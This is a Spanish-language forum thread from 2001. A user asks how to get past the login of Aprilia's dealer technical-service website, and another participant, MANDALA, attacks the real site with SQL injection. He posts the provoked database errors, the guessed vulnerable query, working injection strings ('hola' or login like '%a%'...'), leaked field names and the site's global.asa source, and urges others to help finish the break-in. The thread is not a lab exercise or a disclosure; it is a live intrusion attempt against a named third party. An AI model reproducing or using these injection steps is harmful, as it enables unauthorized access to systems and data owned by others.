PDA

Ver la versión completa : Como podria entar en esta web???



aspar
22-12-2001, 15:54
Hola vereis os explico mi problema. Estoy intentando entrar en la web http://www.serviceaprilia.com/Index_f.htm. El tema es que necesito entrar en el apartado de servicio tecnico para conseguir el despiece de un motor de aprilia rs250 y claro me pide clave y usuario.
Me podrias explicar que pasos tendria que hacer para intentar entrar??
Saludos y gracias de antemano.

CrAcKzMe
22-12-2001, 18:47
404 Error - File Not Found
The Web page you requested was not found.

Try to the Aprilia Consumer Service Home Page.

Comments? Suggestions? Please email us.

aspar
22-12-2001, 19:01
Lo siento. Se accede como: http://www.serviceaprilia.com

CrAcKzMe
22-12-2001, 19:04
juass, ok, pero no se mucho de esto, habrá que pedir mas ayuda ;)

CrAcKzMe
22-12-2001, 19:05
Donde quieres entrar exactamente?? Ya que ese link estaba mal.. donde quieres entrar¿?¿

aspar
22-12-2001, 21:12
Pues quisiera acceder al la zona "Enter Technical Web Site".
Ahi es donde me pide los datos, y lo que quiero saber es que
pasos puedo seguir para saltarme eso!!!!!!!!
Saludos.

CrAcKzMe
23-12-2001, 17:35
Si, el site entonces es http://www.serviceaprilia.com/ita/auth_error.asp
aunque siento decirte que no tengo ni la mas minima idea de como penetrar en ese site. No conozco ningun bug en asp, ni nada asi. La cuenta no es gratis, eh? xD

No lo sé, quizás alguien mas pueda ayudar. :)

MANDALA
25-12-2001, 06:47
mmm la tipica page login pass de asp.
Estas paginas utilizan o bien un simple script o una base de datos user/pass para loguear.En este caso utiliza una base de datos acces para esta tarea puesto ke no tiene el Mysql instalado ni nada por el estilo.
Estas paginas

He hecho unos pekeños desbordamientos para ver si cantaba el nombre de la base de datos para descargarla y asi aceder a todo lo ke kieras,pero de momento no la he sacado.Este es el resultado,a ver si entre todos sacamos algo.

---------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

Si sono verificati errori.

/inc/IndexStatsAdd.asp, line 14
-----------------------------------------------------------------------------

-----------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi
(operatore mancante) nell'espressione della query

/inc/IndexAuthentication.asp, line 10
------------------------------------------------------------------------------

Estos errores los provoca el caracter ' .Es muy peligroso si no se tiene en cuenta.De estos dos errores el ke interesa es "inc/IndexAuthentication.asp, line 10" .
En esta linea lo mas seguro ke se encuentre la cadena de consulta SQL a la base de datos para comparar el user y pass ke introduces en el formulario con los de la base de datos .La cadena de consulta es de este tipo:
ConsultaSQL="SELECT * FROM tabla_de_usuarios WHERE login='" & request.querystring("login") & "' AND password='" & request.querystring("password) & "'"

Pues bien..amos al grano.El error lo provoca el caracter ' cuando lo meto en el formulario en el campo del user,por ejemplo user:hola' x
pass:lokesea
Esto kiere decir ke peta en el campo "login" de la cadena SQL.
Asi kedaria la cadena SELECT * FROM tabla_de_usuarios WHERE login='hola' x' AND password='qualquiercosa'"

Y ahora pensemos..mm..si le añadimos un OR a la cadena SQL?..si despues del ' continuamos nosotros la cadena SQL?,puesto ke da un error jeje.

hackhispano' or login like '%a%' or login='lokesea

Esta consulta SQL nos daria un recordset con los datos de un user ke su nombre comience por a (si ponemos '%a%' claro) y entrariamos en su cuenta dentro del web.(Si construimos la cadena buena claro).He puesto esta cadena y ya cambia el tipo de error :)

hola' or login like '%a%' or login='algo

----------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e10'

[Microsoft][Driver ODBC Microsoft Access] Parametri insufficienti. Previsto 1.

/inc/IndexAuthentication.asp, line 10
-----------------------------------------------------------------------------
Entre todos igual sacamos la cadena,lo digo para intentar otras cosas no lo superaburrido de pillar de diccionario y a crackear,eso no es constructivo ni divertido.Hay mas formas aparte de crackear oñe,aunke sean mas complicadas.

aspar
25-12-2001, 15:27
Pues eso que gracias por tu ayuda Mandala. No estoy muy puesto en
esto pero voy a empoyarme lo que pueda a ver si consigo entrar en la
web, eso seria para mi como conseguir un libro gordo de petete!!!!!!
Saludos.

dscsoft
27-12-2001, 23:24
aunque tengas la cadena para sacar los datos del recordset
'select user,password from tabla mytabla where user like '%a%'
te encontrarias que no tienes permiso de administrador para engancharte a esa tabla, no?
con lo que sin permiso para acceder a la tabla, no podrias lanzarle cadenas sql.

dime si me equivoco.

MANDALA
28-12-2001, 05:08
No hace falta tener permisos de admin para engancharse a esa tabla porke la conexion con la base de datos se hace antes de ke se ejecute la cadena SQL.En este caso solo necesitamos saber el nombre de los campos de consulta.
Cuanto pones un user pass,se ejecuta la cadena SQL de consulta a la base de datos y hace la comparacion..pero el problema es ¿Cual es el nombre del atributo de la base de datos que contiene el nombre de usuario?¿y el de pass? No tiene porke se login o pass,puede ser user pass,usuario contraseña,iduser password...cualkier cosa puede ser,es imposible saber.

Pero si.En cuanto metes ' el script peta en el campo del login y puedes meter la cadena SQL de consulta,ke te la ejecuta.El caso es ke los nombres de los campos login pass sean ciertos.

MANDALA
28-12-2001, 05:41
Un par de errores mas.JE je je.

Akii hay algunos nombres de campos :)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query 'Cod_Aprilia LIKE 'hola' or code_aprilia like '%a%' ' AND Password LIKE '' AND GroupName LIKE 'Aprilia' OR Cod_Aprilia LIKE 'hola' or code_aprilia like '%a%' ' AND Password LIKE '' AND GroupName LIKE 'Importer''.

/exp/index.asp, line 10

Y AKI PONGO EL GLOBAL.ASA..YA SON MUCHAS PISTAS NO?

<SCRIPT LANGUAGE=VBScript RUNAT=Server>

' inizio counter -->

Sub Session_OnStart
Session.Timeout = 120
Application.Lock
Application( "customerCount" ) = Application( "customerCount" ) + 1
Application.UnLock
End Sub

Sub Session_OnEnd
Application.Lock
Application( "customerCount" ) = Application( "customerCount" ) - 1
Application.UnLock
Session.Abandon
End Sub

Sub Application_OnStart
Application( "customerCount" ) = 0
End Sub

Sub Application_OnEnd
End Sub


' fine counter -->

Sub Application_OnStart()
Application("cddati") = "cddati"
Application("cdutente") = "cdutente"
End Sub

Sub Application_OnEnd()
Set Application("cddati") = Nothing
Set Application("cdutente") = Nothing
End Sub

Sub Session_OnStart()
Session("IsGoodUser") = ""
Session("UserName") = ""
Session("CodImp") = ""
Session("CodList") = ""
Session("Lang") = ""
Session("Descr") = ""
' Mette_Lingua
Session("Cat") = ""
Session("Tav") = ""
Session("Rel") = ""
Session("Model") = ""
Session("Flag_ListinoA") = ""
Session("Flag_ListinoB") = ""
Session("Vis_ListinoA") = ""
Session("Vis_ListinoB") = ""
End Sub


Sub Session_OnEnd ()
Set Session("IsGoodUser") = Nothing
Set Session("UserName") = Nothing
Set Session("CodImp") = Nothing
Set Session("CodList") = Nothing
Set Session("Lang") = Nothing
Set Session("Descr") = Nothing
Set Session("Cat") = Nothing
Set Session("Tav") = Nothing
Set Session("Rel") = Nothing
Set Session("Model") = Nothing
Set Session("Flag_ListinoA") = Nothing
Set Session("Flag_ListinoB") = Nothing
Set Session("Vis_ListinoA") = Nothing
Set Session("Vis_ListinoB") = Nothing
End Sub

Sub Mette_Lingua()
Select Case Session("Lang")
Case "IT"
Session("Descr") = "Descr_italiano"
Case "IN"
Session("Descr") = "Descr_inglese"
Case "TE"
Session("Descr") = "Descr_tedesco"
Case "FR"
Session("Descr") = "Descr_francese"
Case "SP"
Session("Descr") = "Descr_spagnolo"
Case Else
Session("Descr") = "Descr_inglese"
End Select
End Sub

</SCRIPT>

aspar
28-12-2001, 21:27
Hola de nuevo Mandala, de verdad que por mas que leo y releo no me entero. Si ya se que para el que sepa de verdad lo tendria claro pero yo nada de nada; a ver si me puedes dar el ultimo empunjocito!!!!!!
saludos y gracias